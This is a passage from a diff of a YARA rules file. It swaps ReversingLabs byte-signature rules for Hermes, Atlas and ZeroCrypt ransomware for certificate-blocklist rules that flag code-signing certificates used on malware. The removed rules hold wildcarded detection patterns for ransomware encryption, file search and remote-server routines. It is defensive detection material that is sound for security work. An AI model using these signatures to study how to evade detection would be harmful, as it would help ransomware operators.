-            0F 84 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? 50 53 6A ?? FF 75 ?? 6A ?? FF 75 ?? FF 15 ?? ??
-            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F
-            84 ?? ?? ?? ?? 83 65 ?? ?? 8D 45 ?? 6A ?? 50 FF 75 ?? 53 56 FF 15 ?? ?? ?? ?? 85 C0
-            0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 41 8B 55 ?? 05 ?? ?? ?? ?? 89 4D ?? 89 45 ?? 3B
-            CA 0F 86 ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 8D 7D ?? 66 C7 45 ?? ?? ?? AB AB AB
-            AB 66 AB 33 C0 88 45 ?? 39 45 ?? 77 ?? 81 7D ?? ?? ?? ?? ?? 77 ?? 8D 45 ?? 50 8D 45
-            ?? 50 E8 ?? ?? ?? ?? 59 59 EB ?? 6A ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 33 C0 8D 7D ??
-            AB 6A ?? AB 66 AB 8D 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 FF 8D 45 ?? 57 50 8D
-            45 ?? 89 7D ?? 50 E8 ?? ?? ?? ?? 59 50 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ??
-            68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? E9 ?? ?? ?? ?? 8D 45 ?? 50 57 57 6A
-        }
-		$hermes_encrypt_files_v2_p5 = {
-            FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ??
-            ?? 6A ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 57 6A ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85
-            C0 75 ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? E9 ?? ?? ?? ?? 57 8D 45 ?? 89
-            7D ?? 50 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ??
-            ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? E9 ?? ?? ?? ?? 39 7D ?? 77 ?? 81 7D ?? ?? ?? ?? ??
-            76 ?? 6A ?? 57 0F 57 C0 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 83 F8
-            ?? 75 ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? EB ?? 57 8D 45 ?? 89 7D ?? 50
-            6A ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 57 53 FF
-            15 ?? ?? ?? ?? 6A ?? EB ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 53 E8 ?? ?? ?? ??
-            83 C4 ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 6A ?? 5B EB ?? 68 ?? ?? ?? ?? 6A ??
-            53 FF 15 ?? ?? ?? ?? 6A ?? 5B 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B C3
-            EB ?? FF 75 ?? FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? EB ?? FF 75 ?? FF 15 ??
-            ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? EB ?? FF 75 ?? FF 15 ?? ?? ?? ?? 56 FF 15 ?? ??
-            ?? ?? 6A ?? 5F EB ?? 6A ?? 5F 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 6A ?? 53 FF 15 ?? ?? ?? ?? EB ?? 6A ?? E9 ?? ?? ?? ?? 6A ?? 5F 56 FF 15 ??
-            ?? ?? ?? 8B C7 5F 5E 5B 8B E5 5D C3
-        }
-		$hermes_find_files_v2_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 8B 5D ?? 8D 85 ?? ?? ?? ?? 56 57 50 68 ?? ?? ?? ?? 53
-            E8 ?? ?? ?? ?? 59 59 50 FF 15 ?? ?? ?? ?? 8B F8 68 ?? ?? ?? ?? 53 89 7D ?? E8 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 53 8B F0 E8 ?? ?? ?? ?? 2B C6 33 C9 83 C4 ?? 66 89 0C 43 83
-            FF ?? 0F 84 ?? ?? ?? ?? 33 F6 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 83 F8 ?? 75 ??
-            8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 57
-            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 83
-            F8 ?? 75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8D
-            85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 58 6A ?? 5F 6A
-            ?? 5A 6A ?? 66 89 45 ?? 58 6A ?? 59 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ??
-            66 89 45 ?? 33 C0 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89
-        }
-		$hermes_find_files_v2_p2 = {
-            45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 33 C0 66 89 45 ?? 58 6A ?? 66 89 45
-            ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 33 C0 66 89 55 ??
-            66 89 55 ?? 5A 6A ?? 66 89 45 ?? 58 6A ?? 66 89 85 ?? ?? ?? ?? 58 6A ?? 66 89 4D ??
-            66 89 4D ?? 66 89 8D ?? ?? ?? ?? 59 66 89 85 ?? ?? ?? ?? 6A ?? 58 66 89 85 ?? ?? ??
-            ?? 33 C0 66 89 7D ?? 66 89 BD ?? ?? ?? ?? 8D 7D ?? 89 75 ?? 66 89 75 ?? 66 89 55 ??
-            89 75 ?? 66 89 75 ?? 66 89 8D ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? 66 89 85 ?? ?? ?? ??
-            AB 6A ?? 66 89 4D ?? 66 89 55 ?? AB 66 89 55 ?? 89 75 ?? AB 66 AB 58 6A ?? 66 89 45
-            ?? 58 6A ?? 5F 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ??
-            66 89 45 ?? 58 6A ?? 66 89 45 ?? 58 6A ?? 59 66 89 45 ?? 33 C0 66 89 45 ?? 6A ?? 58
-            66 89 85 ?? ?? ?? ?? 6A ?? 58 66 89 85 ?? ?? ?? ?? 6A ?? 58 66 89 85 ?? ?? ?? ?? 6A
-            ?? 58 66 89 85 ?? ?? ?? ?? 6A ?? 58 66 89 85 ?? ?? ?? ?? 33 C0 66 89 7D ?? 66 89 7D
-            ?? 8D BD ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? 66 89 8D
-        }
-		$hermes_find_files_v2_p3 = {
-            AB AB AB 66 AB 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D
-            45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
-            59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85
-            C0 0F 84 ?? ?? ?? ?? 8B 7D ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45
-            ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59
-            59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0
-        }
-		$hermes_find_files_v2_p4 = {
-            0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 8D 45 ?? 50 8D 85
-            ?? ?? ?? ?? 50 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 45
-            ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50
-            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 8D
-            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? EB ?? 8B 7D ?? F6 85 ?? ?? ??
-            ?? ?? 74 ?? 53 E8 ?? ?? ?? ?? 59 FF 75 ?? 8D 85 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 50 53
-            E8 ?? ?? ?? ?? 59 59 50 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B F0 8D
-            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 2B F0 83 C4 ?? 33 C0 66 89 44 73 ?? 33 F6 8D 85 ??
-            ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 5F 5E
-            5B 8B E5 5D C3
-        }
-		$hermes_enum_resources_v2 = {
-            55 8B EC 83 EC ?? 53 56 57 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75 ?? 33 DB C7 45 ??
-            ?? ?? ?? ?? 53 53 6A ?? 89 5D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ??
-            6A ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D
-            45 ?? 50 56 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 7E ?? 6A ?? 58 66
-            39 07 75 ?? 66 39 47 ?? 75 ?? 50 8D 47 ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 57 FF
-            75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? F7 46 ?? ?? ??
-            ?? ?? 74 ?? FF 75 ?? 56 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 33 C0 5F 5E 5B 8B E5 5D C3
-            33 C0 40 EB
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( ( all of ( $hermes_find_files_v1_p* ) ) and ( all of ( $hermes_encrypt_files_v1_p* ) ) ) or ( ( all of ( $hermes_find_files_v2_p* ) ) and ( all of ( $hermes_encrypt_files_v2_p* ) ) ) ) and ( any of ( $hermes_enum_resources_v* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TOV Virikton" and ( pe.signatures [ i ] . serial == "00:82:23:c7:41:85:ad:d0:92:72:46:f5:e3:3e:ba:c4:67" or pe.signatures [ i ] . serial == "82:23:c7:41:85:ad:d0:92:72:46:f5:e3:3e:ba:c4:67" ) and 1463616000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Atlas : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Dd9E9E1D7C573714E3F567C5380Ae6D0 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Atlas ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2c702b24-4b7e-505c-a694-0d915cc47315"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "72745795-0261-5b7b-b25e-8220bced90ec"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Atlas.yara#L1-L99"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12724-L12742"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1486f931ec096a00d913de0568ddd8aa5a091256445bc28aba90e3e194ebd045"
+		logic_hash = "7bbcdb989d53bafbb2bdb694be72d4f7305323c01e8f1eafcb7cd889df165ff6"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Atlas"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            8B 74 24 ?? 8B 3D ?? ?? ?? ?? 8D 4C 24 ?? 6A ?? 51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 52 56 FF D7 8B 94 24 ?? ?? ?? ?? 8D 44 24 ?? 8D 8C 24 ?? ?? ?? ?? 50 8B 84 24 ??
-            ?? ?? ?? 51 52 50 E8 ?? ?? ?? ?? 8B 54 24 ?? 83 C4 ?? 8D 4C 24 ?? 8D 84 24 ?? ?? ??
-            ?? 6A ?? 51 8B 4C 24 ?? 52 50 51 FF 15 ?? ?? ?? ?? 8D 54 24 ?? 6A ?? 52 55 53 56 FF
-            D7 8B 7C 24 ?? 33 C9 3B FD 89 4C 24 ?? 0F 85 ?? ?? ?? ?? EB ?? 8B 4C 24 ?? 33 F6 8A
-            84 34 ?? ?? ?? ?? 02 C1 F6 E9 88 44 34 ?? 8A 84 34 ?? ?? ?? ?? 02 C1 F6 E9 88 44 34
-            ?? 46 83 FE ?? 7C ?? 8B 74 24 ?? 57 56 8D 44 24 ?? 53 8D 8C 24 ?? ?? ?? ?? 50 51 E8
-            ?? ?? ?? ?? 8B 54 24 ?? 8D 84 24 ?? ?? ?? ?? 52 53 56 8D 8C 24 ?? ?? ?? ?? 50 51 E8
-            ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 83 C4 ?? 8D 54 24 ?? 6A ?? 52 50 53 51 FF 15 ??
-            ?? ?? ?? 8B 44 24 ?? 8D 54 24 ?? 6A ?? 52 55 53 50 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 8B
-            7C 24 ?? 41 3B FD 89 4C 24 ?? 0F 84 ?? ?? ?? ?? 8B 74 24 ?? 85 FF 74 ?? 8B 54 24 ??
-            8D 4C 24 ?? 6A ?? 51 57 53 52 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 8B 44 24
-            ?? 50 FF D6 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 53 FF D6 8B 4C 24 ?? 68 ?? ?? ??
-            ?? 6A ?? 51 FF D6 5F 5E 5D 33 C0 5B 81 C4 ?? ?? ?? ?? C3
-        }
-		$remote_server_1 = {
-            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 33 C9 8D 94 24 ?? ?? ?? ?? 8A 0C 2E
-            8D 84 24 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 46 81 FE ?? ??
-            ?? ?? 7C ?? 8D 8C 24 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 52 E8 ?? ??
-            ?? ?? 83 C4 ?? 33 F6 33 C0 8D 8C 24 ?? ?? ?? ?? 8A 04 1E 8D 94 24 ?? ?? ?? ?? 50 51
-            68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 46 81 FE ?? ?? ?? ?? 7C ?? 8D 84 24 ?? ??
-            ?? ?? 8D BC 24 ?? ?? ?? ?? 50 83 C9 ?? 33 C0 33 F6 F2 AE F7 D1 49 51 8D 8C 24 ?? ??
-            ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 83 FE ??
-            0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 46 FF 15 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 83 C9 ??
-            33 C0 8D 94 24 ?? ?? ?? ?? F2 AE F7 D1 49 52 8D 84 24 ?? ?? ?? ?? 51 50 68 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? BE ?? ?? ?? ?? 8D 84 24 ?? ??
-            ?? ?? 8A 10 8A 1E 8A CA 3A D3 75 ?? 84 C9 74 ?? 8A 50 ?? 8A 5E ?? 8A CA 3A D3 75 ??
-            83 C0 ?? 83 C6 ?? 84 C9 75 ?? 33 C0 EB
-        }
-		$remote_server_2 = {
-            68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 51 2B D8 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 52 03 D8 E8 ?? ?? ?? ?? 8B CB 8B F0 8B C1 83 C6 ?? 8D BC 24 ?? ?? ?? ?? 83 C4
-            ?? C1 E9 ?? F3 A5 8B C8 68 ?? ?? ?? ?? 83 E1 ?? 68 ?? ?? ?? ?? F3 A4 8D 8C 24 ?? ??
-            ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 94 24 ?? ?? ?? ?? BB
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 2B D8 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ??
-            ?? ?? ?? 03 D8 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B CB 8B F0 8B
-            D1 BF ?? ?? ?? ?? C1 E9 ?? F3 A5 83 C4 ?? 8B CA 83 E1 ?? 8D 84 24 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? F3 A4 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            BB ?? ?? ?? ?? 2B D8 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ??
-            ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 03 D8 E8 ??
-            ?? ?? ?? 8B CB 8B F0 8B C1 83 C6 ?? BF ?? ?? ?? ?? 68 ?? ?? ?? ?? C1 E9 ?? F3 A5 8B
-            C8 68 ?? ?? ?? ?? 83 E1 ?? F3 A4 E8 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 83 C9 ?? 33 C0
-            83 C4 ?? F2 AE F7 D1 49 83 F9 ?? 0F 82 ?? ?? ?? ?? 33 F6 8D BC 24 ?? ?? ?? ?? 8D 8C
-            34 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 46 83 C7 ?? 81 FE ?? ??
-            ?? ?? 72 ?? 8B 3D ?? ?? ?? ?? FF D7 8D 94 24 ?? ?? ?? ?? 56 52 8B E8 E8 ?? ?? ?? ??
-            83 C4 ?? FF D7 8B F0 8D 44 24 ?? 50 2B F5 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            4C 24 ?? 8D 94 24 ?? ?? ?? ?? 51 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ??
-            8D 84 24 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 50 83 C9 ?? 33 C0 F2 AE F7 D1 49 51 8D 8C
-            24 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
-        }
-		$send_post_packet = {
-            68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 83
-            FE ?? 89 75 ?? 75 ?? 50 E8 ?? ?? ?? ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B
-            8B E5 5D C3 6A ?? 66 C7 45 ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 66 89 45 ?? 52 E8 ?? ??
-            ?? ?? 89 45 ?? 8D 45 ?? 6A ?? 50 56 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 56 E8 ?? ?? ?? ??
-            33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 8D BD ?? ?? ?? ?? 83 C9 ??
-            33 C0 6A ?? F2 AE F7 D1 49 51 8D 8D ?? ?? ?? ?? 51 56 E8 ?? ?? ?? ?? 83 F8 ?? 75 ??
-            56 E8 ?? ?? ?? ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$send_get_request = {
-            68 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 83
-            FB ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? 55 FF 15 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 5F 5E 5D 33
-            C0 5B 81 C4 ?? ?? ?? ?? C3 6A ?? 66 C7 44 24 ?? ?? ?? E8 ?? ?? ?? ?? 8D 54 24 ?? 66
-            89 44 24 ?? 52 E8 ?? ?? ?? ?? 89 44 24 ?? 8D 44 24 ?? 6A ?? 50 53 E8 ?? ?? ?? ?? 83
-            F8 ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? 55 FF 15 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 5F 5E 5D 33
-            C0 5B 81 C4 ?? ?? ?? ?? C3 8B FD 83 C9 ?? 33 C0 6A ?? F2 AE F7 D1 49 51 55 53 E8 ??
-            ?? ?? ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? 55 FF 15 ?? ?? ?? ?? 53 E8 ?? ?? ?? ??
-            5F 5E 5D 33 C0 5B 81 C4 ?? ?? ?? ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $encrypt_files and $remote_server_1 and $remote_server_2 and $send_post_packet and $send_get_request
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CREA&COM d.o.o." and ( pe.signatures [ i ] . serial == "00:dd:9e:9e:1d:7c:57:37:14:e3:f5:67:c5:38:0a:e6:d0" or pe.signatures [ i ] . serial == "dd:9e:9e:1d:7c:57:37:14:e3:f5:67:c5:38:0a:e6:d0" ) and 1575849600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Zerocrypt : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_3D5E71 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects ZeroCrypt ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "89e47d7f-1ac4-570d-8ae1-30f0acc21462"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "7180b20d-f367-5260-88cd-dd2a1269f89b"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.ZeroCrypt.yara#L1-L94"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12744-L12760"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "947925206ded187eac31c5046d75ab017869ae3f8dc906f2e5536d4db219f108"
+		logic_hash = "aa73ac6569e4bb0084d7b148b2186ec2737a691a133319b21b666aa16bca9f2d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "ZeroCrypt"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_file_1 = {
-            55 8B EC 83 E4 ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ??
-            ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 84 24 ?? ??
-            ?? ?? 64 A3 ?? ?? ?? ?? 8B F2 8B F9 68 ?? ?? ?? ?? 8B D7 8D 4C 24 ?? E8 ?? ?? ?? ??
-            83 C4 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 8B D0 56 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? C6 84 24 ?? ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? FF 74 24 ?? E8 ?? ?? ?? ??
-            83 C4 ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 83 7E ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 89 44
-            24 ?? 72 ?? 8B 16 EB ?? 8B D6 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 84 24 ?? ?? ??
-            ?? ?? 33 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84
-            24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 84 24 ?? ?? ?? ??
-            C6 84 24 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 8B D6 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B F0 C6 84 24 ?? ?? ?? ?? ?? 8B
-            D7 68 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 84 24 ?? ?? ?? ?? ?? 8B D0
-            56 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 84 24 ?? ?? ?? ?? ?? 8B D0 68 ?? ?? ?? ??
-            8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 C6 84 24 ?? ?? ?? ?? ?? 8D 84 24 ?? ?? ??
